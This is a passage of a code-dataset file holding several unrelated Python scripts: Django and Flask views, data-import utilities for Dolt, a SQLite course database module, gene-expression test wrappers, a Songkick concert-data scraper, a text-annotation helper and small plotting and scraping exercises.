Game.objects.get(pk=pk)\n\n if(game.user.id != user.id):\n messages.error(request, \"Unable to delete {0}. Not the user for this game.\".format(game))\n return redirect('games:list')\n\n game.deleted = True\n\n game.save()\n\n messages.success(request, \"Game {0} successfully deleted\".format(game))\n return redirect('games:list')\n","sub_path":"games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"246267735","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport pandas as pd\n\nfile_name = 'data1.xlsx' \ndf = pd.read_excel(file_name)[['text', 'suicidal_ideation']]\n\n\nfor index, row in df.iterrows():\n X = row['text']\n Y = row['suicidal_ideation']\n print('*'*100)\n print(\"Text #: \", index)\n print(\"Could the following text indicate the want to commit suicide?\")\n print(X)\n check = True\n while(check):\n ans = input(\"Please enter y for YES or n for NO: \").lower()\n if ans == \"yes\" or ans =='y':\n df[\"suicidal_ideation\"][index] = 1\n check = False\n elif ans == \"no\" or ans =='n':\n df[\"suicidal_ideation\"][index] = 0\n check = False\n else:\n print(\"!!!!Invalid input!!!!\")\n break\n\n\ndf.to_csv('annotated_data1.csv', index=False)","sub_path":"archive/research/suicidal_ideation_annotator_helper/self_annotator1.py","file_name":"self_annotator1.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"308592390","text":"from typing import List, Callable, Any, Mapping\nimport pandas as pd\nfrom doltpy.core.dolt import Dolt, DEFAULT_HOST, DEFAULT_PORT\nimport logging\nimport io\nimport tempfile\nfrom datetime import datetime\nfrom sqlalchemy import String, DateTime, Integer, Float, Table, MetaData, Column\nimport math\n\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_BATCH_SIZE = 300000\nCREATE, FORCE_CREATE, REPLACE, UPDATE = 'create', 'force_create', 'replace', 'update'\nIMPORT_MODES_TO_FLAGS = {CREATE: ['-c'],\n FORCE_CREATE: ['-f', '-c'],\n REPLACE: ['-r'],\n UPDATE: ['-u']}\n\n\ndef import_df(repo: Dolt,\n table_name: str,\n data: pd.DataFrame,\n primary_keys: List[str],\n import_mode: str = None):\n \"\"\"\n Imports the given DataFrame object to the specified table, dropping records that are duplicates on primary key\n (in order, preserving the first record, something we might want to allow the user to sepcify), subject to\n 
given import mode. Import mode defaults to CREATE if the table does not exist, and UPDATE otherwise.\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :return:\n \"\"\"\n def writer(filepath: str):\n clean = data.dropna(subset=primary_keys)\n clean.to_csv(filepath, index=False)\n\n _import_helper(repo, table_name, writer, primary_keys, import_mode)\n\n\ndef bulk_import(repo: Dolt,\n table_name: str,\n data: io.StringIO,\n primary_keys: List[str],\n import_mode: str = None) -> None:\n \"\"\"\n This takes a file like object representing a CSV and imports it to the table specified. Note that you must\n specify the primary key, and the import mode. The import mode is one of the keys of IMPORT_MODES_TO_FLAGS.\n Choosing the wrong import mode will throw an error, for example `CREATE` on an existing table. Import mode\n defaults to CREATE if the table does not exist, and UPDATE otherwise.\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :return:\n \"\"\"\n def writer(filepath: str):\n with open(filepath, 'w') as f:\n f.writelines(data.readlines())\n\n _import_helper(repo, table_name, writer, primary_keys, import_mode)\n\n\ndef _import_helper(repo: Dolt,\n table_name: str,\n write_import_file: Callable[[str], None],\n primary_keys: List[str],\n import_mode: str) -> None:\n import_modes = IMPORT_MODES_TO_FLAGS.keys()\n if import_mode is not None:\n assert import_mode in import_modes, 'update_mode must be one of: {}'.format(import_modes)\n else:\n if table_name in [table.name for table in repo.ls()]:\n logger.info('No import mode specified, table exists, using \"{}\"'.format(UPDATE))\n import_mode = UPDATE\n else:\n logger.info('No import mode specified, table exists, using \"{}\"'.format(CREATE))\n import_mode = CREATE\n\n import_flags = IMPORT_MODES_TO_FLAGS[import_mode]\n logger.info('Importing to table {} in dolt directory located in {}, import mode {}'.format(table_name,\n repo.repo_dir(),\n import_mode))\n fp = tempfile.NamedTemporaryFile(suffix='.csv')\n write_import_file(fp.name)\n args = ['table', 'import', table_name, '--pk={}'.format(','.join(primary_keys))] + import_flags\n repo.execute(args + [fp.name])\n\n\ndef import_dict(repo: Dolt,\n table_name: str,\n data: Mapping[str, List[Any]],\n primary_keys: List[str] = None,\n import_mode: str = None,\n batch_size: int = DEFAULT_BATCH_SIZE):\n \"\"\"\n Provides a column major interface for writing Python data structures to Dolt, specifically data should be a dict\n where the keys are column names and the values are equal length lists of values to be written to Dolt. 
The lists\n must consist of:\n - values that match the type of the table in the schema of the table being written to\n - values of the same type that can be coalesced to a Python type by the (very limited) type inference logic\n for generating a schema from a data structure\n\n Note it is necessary for all list to be of the same length since we must coalesce the lists into rows, and that\n doesn't really make sense when the lists are not of the same length.\n\n Let's proceed with the example of creating a simple table and showing how to write some data structures:\n CREATE TABLE players (id INT, name VARCHAR(16), PRIMARY KEY (id))\n\n Now write in update mode:\n >>> dict_of_lists = {'id': [1, 2], 'name': ['Roger', 'Rafael']}\n >>> import_dict(repo, 'players', dict_of_lists, import_mode='update')\n\n Alternatively we can let the Python code infer a schema:\n >>> import_dict(repo, 'players', dict_of_lists, ['id'], import_mode='create')\n\n Assertions:\n - all list values are of equal length\n - when inferring a schema each list value has elements of a type that can be mapped to a SQL type, the logic is\n currently very limited\n - when inferring a schema\n\n This function requires the Dolt SQL server to be running on the host and port provided, defaulting to\n 127.0.0.1:3306.\n\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :param batch_size:\n :return:\n \"\"\"\n assert import_mode in [UPDATE, CREATE]\n\n # Grab some basic information about the data\n assert data, 'Cannot provide an empty dictionary'\n row_count = len(list(data.values())[0])\n assert row_count > 0, 'Must provide at least a single row'\n assert all(len(val_list) == row_count for val_list in data.values()), 'Must provide value lists of uniform length'\n\n # Get an Engine object\n\n # If the table does not exist, create it using type inference to build a create statement\n if import_mode == CREATE:\n assert primary_keys, 'primary_keys need to be provided when inferring a schema'\n _create_table_inferred(repo, table_name, data, primary_keys)\n\n rows = []\n for i in range(row_count):\n rows.append({col: data[col][i] for col in data.keys()})\n\n logger.info('Inserting {row_count} rows into table {table_name}'.format(row_count=row_count,\n table_name=table_name))\n table = MetaData(bind=repo.engine, reflect=True).tables[table_name]\n for i in range(max(1, math.ceil(len(rows) / batch_size))):\n batch_start = i * batch_size\n batch_end = min((i+1) * batch_size, len(rows))\n batch = rows[batch_start:batch_end]\n logger.info('Writing records {} through {} of {} rows to Dolt'.format(batch_start, batch_end, len(rows)))\n with repo.engine.connect() as conn:\n conn.execute(table.insert(), batch)\n\n\ndef _create_table_inferred(repo: Dolt, table_name: str, data: Mapping[str, List[Any]], primary_keys: List[str]):\n # generate and execute a create table statement\n cols_to_types = {}\n for col_name, list_of_values in data.items():\n # Just take the first value to by the type\n first_non_null = None\n for val in list_of_values:\n if val is not None:\n first_non_null = val\n break\n raise ValueError('Cannot provide an empty list, types cannot be inferred')\n cols_to_types[col_name] = _get_col_type(first_non_null, list_of_values)\n\n metadata = MetaData(bind=repo.engine)\n table = _get_table_def(metadata, table_name, cols_to_types, primary_keys)\n table.create()\n\n\ndef _get_col_type(sample_value: Any, values: Any):\n if type(sample_value) == str:\n return String(2 * max(len(val) for val in 
values))\n elif type(sample_value) == int:\n return Integer\n elif type(sample_value) == float:\n return Float\n elif type(sample_value) == datetime:\n return DateTime\n else:\n raise ValueError('Value of type {} is unsupported'.format(type(sample_value)))\n\n\ndef _get_table_def(metadata, table_name: str, cols_with_types: Mapping[str, str], pks: List[str]):\n columns = [Column(col_name, col_type, primary_key=col_name in pks)\n for col_name, col_type in cols_with_types.items()]\n return Table(table_name, metadata, *columns)\n\n\ndef import_list(repo: Dolt,\n table_name: str,\n data: List[Mapping[str, Any]],\n primary_keys: List[str] = None,\n import_mode: str = None,\n batch_size: int = DEFAULT_BATCH_SIZE):\n \"\"\"\n This provides a write interface for writing row major Python data structures to Dolt. The data parameter should be a\n list of dicts, where each dict represents a row. Each dict must have the same columns, and:\n - values that match the type of the table in the schema of the table being written to\n - values of the same type that can be coalesced to a Python type by the (very limited) type inference logic\n for generating a schema from a data structure.\n\n Let's proceed with the example of creating a simple table and showing how to write some data structures:\n CREATE TABLE players (id INT, name VARCHAR(16), PRIMARY KEY (id))\n\n Now write in update mode:\n >>> list_of_dicts = [{'id': 1, 'name': 'Roger'}, {'id': 2, 'name': 'Rafael'}]\n >>> import_list(repo, 'players', list_of_dicts, import_mode='update')\n\n Alternatively we can let the Python code infer a schema\n >>> import_list(repo, 'players', list_of_dicts, ['id'], import_mode='create')\n\n Note some restrictions (which we should loosen in a future release):\n - all dicts must have the same set of columns, and they must be a strict subset of the table's columns\n - when inferring a schema the type inference is very limited, and all values that correspond to a given key\n must be of the same type\n - when inferring a schema we cannot have a column of null values since no schema can be inferred\n\n This function requires the Dolt SQL server to be running on the host and port provided, defaulting to\n 127.0.0.1:3306.\n\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :param batch_size:\n :return:\n \"\"\"\n assert data, 'Cannot provide empty dict'\n\n reformatted = {}\n cols = set(data[0].keys())\n\n logger.info('Reshaping data into columns')\n for row in data:\n assert set(row.keys()) == cols, 'Two rows with different keys found'\n\n for col_name, value in row.items():\n if col_name in reformatted:\n reformatted[col_name].append(value)\n else:\n reformatted[col_name] = [value]\n\n import_dict(repo, table_name, reformatted, primary_keys, import_mode, batch_size)\n","sub_path":"doltpy/core/write/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":11163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"36194593","text":"\nfrom connection import create_connection,create_table\n\nnew_conn = create_connection(\"GestionFormaton.db\")\n\nif new_conn is None:\n raise Exception(\"Error! 
cannot create the database connection.\")\n\nsql_create_tables = \"\"\" CREATE TABLE \"Cursus\" (\n \"idCursus\"\tINTEGER NOT NULL,\n \"nomCursus\"\tTEXT NOT NULL,\n PRIMARY KEY(\"idCursus\" AUTOINCREMENT)\n );\n CREATE TABLE \"Etudiant\" (\n \"idEtudiant\"\tINTEGER NOT NULL,\n \"nomEtudiant\"\tTEXT NOT NULL,\n \"prenomEtudiant\"\tTEXT NOT NULL,\n \"age\"\tINTEGER NOT NULL,\n \"idCursus\"\tINTEGER,\n PRIMARY KEY(\"idEtudiant\" AUTOINCREMENT),\n FOREIGN KEY(\"idCursus\") REFERENCES \"Cursus\"(\"idCursus\")\n );\n CREATE TABLE \"Matiere\" (\n \"idMatiere\"\tINTEGER NOT NULL,\n \"nomMatiere\"\tTEXT NOT NULL,\n PRIMARY KEY(\"idMatiere\" AUTOINCREMENT)\n );\n CREATE TABLE \"Matiere_Cursus\" (\n \"idMatiere\"\tINTEGER NOT NULL,\n \"idCursus\"\tINTEGER NOT NULL,\n FOREIGN KEY(\"idMatiere\") REFERENCES \"Matiere\"(\"idMatiere\"),\n FOREIGN KEY(\"idCursus\") REFERENCES \"Cursus\"(\"idCursus\"),\n PRIMARY KEY(\"idMatiere\",\"idCursus\")\n );\"\"\"\ncreate_table(new_conn,sql_create_tables)\n\n\n#\"#### 1) Add Data ##########################################\"\"\"\n\n\n\ndef ajouterMatiere(conn,nomMatiere):\n sql = ''' INSERT INTO Matiere(nomMatiere)\n VALUES(?) '''\n cur = new_conn.cursor()\n cur.execute(sql, nomMatiere)\n conn.commit()\n return cur.lastrowid\n\ndef ajouterCursus(conn,nomCursus):\n sql = ''' INSERT INTO Cursus(nomCursus)\n VALUES(?) '''\n cur = conn.cursor()\n cur.execute(sql, nomCursus)\n conn.commit()\n return cur.lastrowid\n\ndef ajouterEtudiant(conn,etudiant):\n\n sql = ''' INSERT INTO Etudiant(nomEtudiant,prenomEtudiant,age)\n VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, etudiant)\n conn.commit()\n return cur.lastrowid\n\ndef lierCursusMatiere(conn,matieres_cursus):\n\n sql = ''' INSERT INTO students VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.executemany(sql,matieres_cursus)\n conn.commit()\n return cur.lastrowid\n\n\n\n#\"#### 2) Select Data ##########################################\"\"\"\n\ndef listerMatieres(conn):\n \n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Matiere\")\n\n rows = cur.fetchall()\n\n for matiere in rows:\n print(matiere)\n\ndef listerCursus(conn):\n \n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Cursus\")\n\n rows = cur.fetchall()\n\n for cursus in rows:\n print(cursus)\n\n\ndef listerEtudiant(conn):\n \n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Matiere\")\n\n rows = cur.fetchall()\n\n for etud in rows:\n print(etud)\n\n#\"#### 3) Modify Data ##########################################\"\"\"\n\ndef modifierMatiere(conn,newMatiere):\n if(newMatiere['id'] is not None and newMatiere['nomMatiere'] is not None):\n sql = ''' UPDATE Matiere\n SET nomMatiere = ?,\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql,(newMatiere['nomMatiere'],newMatiere['id']))\n conn.commit()\n\ndef modifierCursus(conn,newCursus):\n if(newCursus['id'] is not None and newCursus['nomCursus'] is not None):\n sql = ''' UPDATE Cursus\n SET nomCursus = ?,\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql,(newCursus['nomMatiere'],newCursus['id']))\n conn.commit()\n\ndef modifierEtudiant(conn,newEtudiant):\n if(newEtudiant['id'] is not None and newEtudiant['row'] is not None):\n sql = ''' UPDATE Etudiant\n SET nomEtudiant = ?,\n prenomEtudiant = ?,\n age = ?,\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql,(newEtudiant['row'],newEtudiant['id']))\n conn.commit()\n\n\n#\"#### 4) Delete Data ##########################################\"\"\"\n\ndef supprimerMatiere(conn,idMatiere):\n sql = 'DELETE FROM Matiere WHERE id=?'\n cur = 
conn.cursor()\n cur.execute(sql, (idMatiere,))\n conn.commit()\n\ndef supprimerCursus(conn,idCursus):\n sql = 'DELETE FROM Cursus WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (idCursus,))\n conn.commit()\n\ndef supprimerEtudiant(conn,idEtudiant):\n sql = 'DELETE FROM Etudiant WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (idEtudiant,))\n conn.commit()\n\ndef afficherEtudiantDeCursus(conn,nomCursus):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Etudiant e where e.idCursus = (Select idCursus from Cursus c where c.nomCursus = ?)\", nomCursus)\n\n rows = cur.fetchall()\n for etud in rows:\n print(etud)\n\n \ndef afficherMatiereCursus(conn,nomMatiere):\n cur = conn.cursor()\n cur.execute(\"SELECT c.nomCursus FROM Cursus c join Matiere_Cursus mc on mc.idCursus=c.idCursus join Matiere m on mc.idMatiere = m.idMatiere where c.nomCursus = ?)\", nomCursus)\n rows = cur.fetchall()\n\n for matiere in rows:\n print(matiere)\n\ndef afficherCursus(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT c.nomCursus FROM Cursus c where c.idCursus not in (select idCursus from matiere_cursus))\")\n rows = cur.fetchall()\n\n for matiere in rows:\n print(matiere)","sub_path":"jour3/modulebdd.py","file_name":"modulebdd.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"423171887","text":"import numpy as np\nfrom joblib import Parallel, delayed\nimport diffxpy.api as de\n\nfrom ..log import setup_logger\nfrom ..utils.validation import _validate_n_jobs\nfrom ._ttest_de import _ttest_differential_expression\nfrom ._unit import Unit\n\n\nclass DE_TTest(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('TTest')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running TTest\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.t_test(\n data=x,\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n is_logged=is_logged\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_Rank(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('Rank')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running Rank Test\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.rank_test(\n data=x,\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n is_logged=is_logged\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_LRT(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('Likelihood Ratio')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running Likelihood Ratio Test\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = 
de.test.two_sample(\n data=x,\n test='lrt',\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n noise_model='nb'\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_Wald(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('Wald')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running Wald Test. This may take some time.\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.two_sample(\n data=np.exp(x),\n test='wald',\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n noise_model='nb'\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_TTest_Cellar(Unit):\n \"\"\"\n One-vs-all T-Test.\n\n Two sided test for the null H_0: The two populations have the same average.\n If the p-value is small (= 0 and t [m].isdigit ():\n return fn (n, m - 1)\n return False\n elif m < 0: return False\n if s [n] == t [m]: return fn (n - 1, m - 1)\n elif t [m].isdigit ():\n val = int (t [m])\n for sz in range (val + 1):\n if fn (n - sz, m - 1): return True\n return False\n # memoized version\n '''dl = [bytearray ([2 for j in range (tl + 11)]) for i in range (sl + 11)]\n def fn (n, m):\n if dl [n][m] != 2: return dl [n][m]\n if n < 0 and m < 0: return 1\n elif n < 0:\n if m >= 0 and t [m].isdigit (): return fn (n, m - 1)\n dl [n][m] = 0; return 0\n elif m < 0: dl [n][m] = 0; return 0\n if s [n] == t [m]: return fn (n - 1, m - 1)\n elif t [m].isdigit ():\n val = int (t [m])\n for sz in range (val + 1):\n if fn (n - sz, m - 1): return 1\n dl [n][m] = 0; return 0'''\n if fn (sl - 1, tl - 1): print ('YES')\n else: print ('NO')\n\nif __name__ == \"__main__\": main ()","sub_path":"_string_transformation2.py","file_name":"_string_transformation2.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236979291","text":"import time\n# 4kjyu\nstart_time = time.time()\n\n\ndef range(args):\n res = []\n final_res = []\n store_res = []\n i = 0\n for ele in args:\n print(\"this is every ele\", ele)\n is_running = True\n if ele in store_res:\n continue\n else:\n while is_running:\n\n if ele + i in args:\n res.append(str(ele + i))\n store_res.append(ele + i)\n else:\n print('This store res', store_res)\n print(\"res\", res)\n if len(res) >= 3:\n store = res[0] + '-' + res[len(res) - 1]\n final_res.append(store)\n else:\n del store_res[len(store_res) - 1]\n final_res.append(str(ele))\n i = 0\n res = []\n print(final_res)\n break\n i += 1\n\n print(final_res)\n\n\nrange([-3, -2, -1, 2, 10, 15, 16, 18, 19, 20])\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n","sub_path":"sokheng_codewar/04_range.py","file_name":"04_range.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"24715724","text":"#!/usr/bin/python3\n\nimport sys\nimport time\nimport datetime\nimport json\nimport logging\nfrom pprint import pprint \nimport requests\nfrom pymongo import 
MongoClient\nimport pymongo\nfrom key import API_KEY\nfrom ratelimit import RateLimited\n\nARTIST_SEARCH_URL = \"http://api.songkick.com/api/3.0/search/artists.json\"\nGIGOGRAPHY_SEARCH_URL = \"http://api.songkick.com/api/3.0/artists/{artist_id}/gigography.json?\"\nREQUESTS = 1.0\nSECONDS = 10.0\nRATE = REQUESTS/SECONDS\n\nDEBUG = False\nLOGGER = logging.getLogger(__name__)\n\n#Function: saveArtist\n# Saves a Songkick API artist document as is\ndef saveArtist(db, data):\n data[\"_id\"] = data[\"id\"]\n artists = db.artists\n try:\n LOGGER.info(\"Attempting to save artist with id: %s\", data[\"id\"])\n if not DEBUG:\n artists.insert_one(data)\n LOGGER.info(\"Successfully saved artist with id: %s\", data[\"id\"])\n else:\n LOGGER.info(\"DEBUG: Bypassed saving artist with id: %s\", data[\"id\"])\n except pymongo.errors.DuplicateKeyError as e:\n LOGGER.error(\"DuplicateKeyError when saving aritst with id: %s\", data[\"id\"])\n\n \n\n#Function: saveEvent\n# Saves a Songkick API event document as is\ndef saveEvent(db, data):\n data[\"_id\"] = data[\"id\"]\n events = db.events\n try:\n LOGGER.info(\"Attempting to save event with id: %s\", data[\"id\"])\n if not DEBUG:\n events.insert_one(data)\n LOGGER.info(\"Successfully saved event with id: %s\", data[\"id\"])\n else:\n LOGGER.info(\"DEBUG: Bypassed saving event with id: %s\", data[\"id\"])\n except pymongo.errors.DuplicateKeyError as e:\n LOGGER.error(\"DuplicateKeyError when saving event with id: %s\", data[\"id\"])\n \n\n#Function: requestArtist \n# Performs an artist search to return id and related fields.\n# Returns false if empty search result\n@RateLimited(RATE)\ndef requestArtist(name):\n LOGGER.info(\"Requesting Artist for: %s\", name)\n payload = {\"apikey\": API_KEY, \"query\": name}\n r = requests.get(ARTIST_SEARCH_URL, params=payload)\n j = r.json()\n if j['resultsPage']['results']:\n LOGGER.info(\"Successfully received Artist data for: %s\", name)\n return j['resultsPage']['results']['artist'][0]\n else:\n LOGGER.error(\"Did not successfully receive artist data for: %s\", name)\n LOGGER.error(\"JSON dump: %s\", j)\n return False\n\n#Function: requestArtist \n# Returns one page of an artists gigography\n# Returns false if reached last page\n@RateLimited(RATE)\ndef requestGigography(id, page):\n LOGGER.info(\"Requesting Gigography for: %s with Page: %s\", id, page)\n payload = {\"apikey\": API_KEY, \"page\": page}\n target = GIGOGRAPHY_SEARCH_URL.format(artist_id=id)\n r = requests.get(target, params=payload)\n j = r.json()\n if j['resultsPage']['results']:\n LOGGER.info(\"Successfully received Gigography for: %s with Page: %s\", id, page)\n return j['resultsPage']['results']['event']\n else:\n LOGGER.error(\"Did not successfully receive Gigography data for: %s page %s\", id, page)\n LOGGER.error(\"JSON dump: %s\", j)\n return False\n\n#Function: getAllArtists\n# Takes a list of artist names, searches for artists, saves each entry and returns list of ids\ndef getAllArtists(db, artists):\n ids = list()\n for x in artists:\n data = requestArtist(x)\n if data:\n ids.append(data['id'])\n saveArtist(db, data)\n LOGGER.info(\"Finished getting all artist profiles from Songkick Search API.\")\n return ids\n\n#Function: getAllGigographies\n#Iterates over a list of artist ids, gets all gigographies by iterating thru pages and saving each event\ndef getAllGigographies(db, artist_ids):\n event_ids = list()\n for x in artist_ids:\n page = 1 \n while True:\n data = requestGigography(x, page)\n if not data:\n break\n for e in data:\n saveEvent(db, 
e)\n event_ids.append(e['id'])\n page += 1\n LOGGER.info(\"Finished getting all gigographies from Songkick Events API.\")\n return event_ids\n\n#Function: readArtistsFromFile\n# Reads in .txt file from command line.\n# Creates array of strings that are used to perform the artist lookup.\ndef readArtistsFromFile():\n artists = list()\n filename = sys.argv[1]\n with open(filename, 'r') as f:\n for artist in f:\n artist = artist.rstrip()\n artists.append(artist)\n return artists\n\n#Function: checkArgs\n# Checks for textfile with artists names.\ndef checkArgs():\n if len(sys.argv) < 2:\n print(\"Error: missing artsts.txt\")\n sys.exit()\n if len(sys.argv) is 3:\n global DEBUG \n DEBUG = True\n print(\"DEBUG MODE ENABLED\")\n\ndef initLogger():\n global LOGGER\n LOGGER.setLevel(logging.DEBUG)\n stamp = str(int(time.time()))\n filename = 'log/SONGKICK_API_{}.log'\n handler = logging.FileHandler(filename.format(stamp))\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n LOGGER.addHandler(handler)\n\n\ndef main():\n checkArgs()\n initLogger()\n client = MongoClient()\n db = client.concert_viz\n names = readArtistsFromFile()\n ids = getAllArtists(db, names)\n event_ids = getAllGigographies(db, ids)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"data/songkickScraper.py","file_name":"songkickScraper.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"520646140","text":"from flask import Flask\nimport random\napp = Flask(__name__)\n\nrandom_number = random.randint(0, 10)\n\n@app.route('/')\ndef hello():\n return '

Guess a number between 0 and 9' \\\n ''\n\n\n@app.route('/')\ndef guess_page(guess):\n if guess > random_number:\n return "Too high, try again!" \\\n ""\n\n elif guess < random_number:\n return "Your guess is too low, try again!" \\\n "\n\n else:\n return "You are right! This is the number!
\" \\\n \"\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"438515441","text":"# 10. Write a Python program to create bar plot of scores by group and gender.\n# Use multiple X values on the same chart for men and women.\n# Sample Data:\n# Means (men) = (22, 30, 35, 35, 26)\n# Means (women) = (25, 32, 30, 35, 29)\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom Week4.Matplotlib.Utility.utility import UtilityClass\n\n\nclass Gender:\n\n # creates utility class object\n utility_obj = UtilityClass()\n\n def Multi_bar(self):\n # create no.of groups\n print(\"how many groups do u wanna create\")\n n_groups = self.utility_obj.accept_size()\n # accepts men data\n print(\"enter men means\")\n men_means = self.utility_obj.CreateList(n_groups)\n # accepts women data\n print(\"enter women means\")\n women_means = self.utility_obj.CreateList(n_groups)\n\n # create plot or creates object of subplot\n fig, ax = plt.subplots()\n\n index = np.arange(n_groups)\n bar_width = 0.35\n\n # plotting men means values to create bar chart\n plt.bar(index, men_means, bar_width, color='g', label='Men')\n\n # plotting women means values to create bar chart\n plt.bar(index + bar_width, women_means, bar_width, color='r', label='Women')\n\n # Set the x axis label\n plt.xlabel('Person')\n\n # Set the y axis label\n plt.ylabel('Scores')\n\n # Sets a title\n plt.title('scores by group and gender')\n\n # group label\n plt.xticks(index + bar_width, ('G1', 'G2', 'G3', 'G4', 'G5'))\n\n # show a legend on the plot\n plt.legend()\n\n # Display a figure.\n plt.show()\n\n\n# creates class object\nobj = Gender()\n# calling method by using class object\nobj.Multi_bar()","sub_path":"Week4/Matplotlib/Barchart/gender.py","file_name":"gender.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356039843","text":"#coding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport bs4\ndef getHTMLText(url):\n try:\n r = requests.get(url,timeout = 30)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n return r.text\n except:\n return \"Here raises an error.\"\n return \"\"\n\ndef fullUnivList(ulist,html):\n soup = BeautifulSoup(html, \"html.parser\")\n for tr in soup.find('tbody').children: #可能出现字符串类型,但是信息都封装在tag里,所以需要过滤掉string\n if isinstance(tr,bs4.element.Tag): #需要import bs4库\n tds = tr('td')\n ulist.append([tds[0].string, tds[1].string,tds[3].string]) #增加大学中的不同属性\n\n # pass #单独定义一个空函数是会报错的,使用pass进行占位\n\ndef printUnivList(ulist,num):\n tplt = \"{0:^10}\\t{1:{3}^10}\\t{2:^10}\"\n print(tplt.format(\"排名\",\"学校名称\",\"分数\",chr(12288))) #chr(12288)是中文字符的填充空格\n for i in range(num):\n u = ulist[i]\n print(tplt.format(u[0],u[1],u[2],chr(12288)))\n\ndef main():\n uinfo = []\n url = 'http://www.zuihaodaxue.cn/zuihaodaxuepaiming2016.html'\n html = getHTMLText(url)\n fullUnivList(uinfo,html)\n printUnivList(uinfo,100) #数字代表多少学校的信息\n\nif __name__ == '__main__':\n 